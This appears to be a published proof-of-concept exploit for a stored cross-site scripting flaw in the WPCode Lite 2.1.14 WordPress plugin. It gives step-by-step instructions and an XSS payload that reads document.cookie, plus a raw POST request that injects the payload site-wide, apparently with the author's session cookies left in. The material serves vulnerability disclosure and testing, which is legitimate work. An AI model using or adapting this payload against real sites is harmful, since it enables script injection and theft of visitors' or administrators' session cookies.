# Exploit Title: Wordpress WPCode Lite Version 2.1.14 Stored XSS
# Date: 2024-06-30
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://wpcode.com/?utm_source=wprepo&utm_medium=link&utm_campaign=liteplugin
# Version 2.1.14
### Steps to Execute the Payload:
1. **Access the Admin Panel:**
- Navigate to the admin panel of your WordPress site.
- Go to `Code Snippets > `Edit Snippet` via the following URL:
```
https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10
```
2. **Insert the Payload:**
- In the **Code Preview** section, insert the following payload:
```
"><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
```
3. **Save and Verify:**
- Active , Save the changes.
- Navigate to the main page of your site:
```
https://127.0.0.1/
```
- You should see the payload executed.
Post Request :
POST /wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 HTTP/2
Host: 127.0.0.1
Cookie: wordpress_sec_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C37619eff632d24400e28a219976a87efa83c4bae1ebe04120e54cb37dbe30a03; wordpress_logged_in_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C49992c3be16529995b5429fdd992a2dc1ff8cafa77c6f72580d9dbf9f3fe82ca; wp-settings-time-1=1719753966; WP-TSW-Session=5lursai747c2vcd5uno86liv2c; wp-settings-1=editor%3Dhtml
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10
Content-Type: application/x-www-form-urlencoded
Content-Length: 673
Origin: https://vagabondcreature.s3-tastewp.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
wpcode_active=&button=publish&wpcode_snippet_title=Untitled+Snippet&wpcode_snippet_type=html&wpcode_snippet_code=%22%3E%3Cimg+src%3Dx+onerrora%3Dconfirm%28%29+onerror%3Dconfirm%28document.cookie%29%3E&wpcode_snippet_text=%3Cp%3E%22%26gt%3B%3Cimg+src%3D%22x%22+%2F%3E%3C%2Fp%3E&wpcode_auto_insert=1&wpcode_auto_insert_location_extra=&wpcode_auto_insert_number=1&wpcode_auto_insert_location=site_wide_header&wpcode-schedule-start=&wpcode-schedule-end=&wpcode_cl_rules=%5B%5D&wpcode_tags=&wpcode_priority=10&wpcode_note=&id=10&wpcode-save-snippet-nonce=73d127c1c2&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpcode-snippet-manager%26snippet_id%3D10%26message%3D1%26error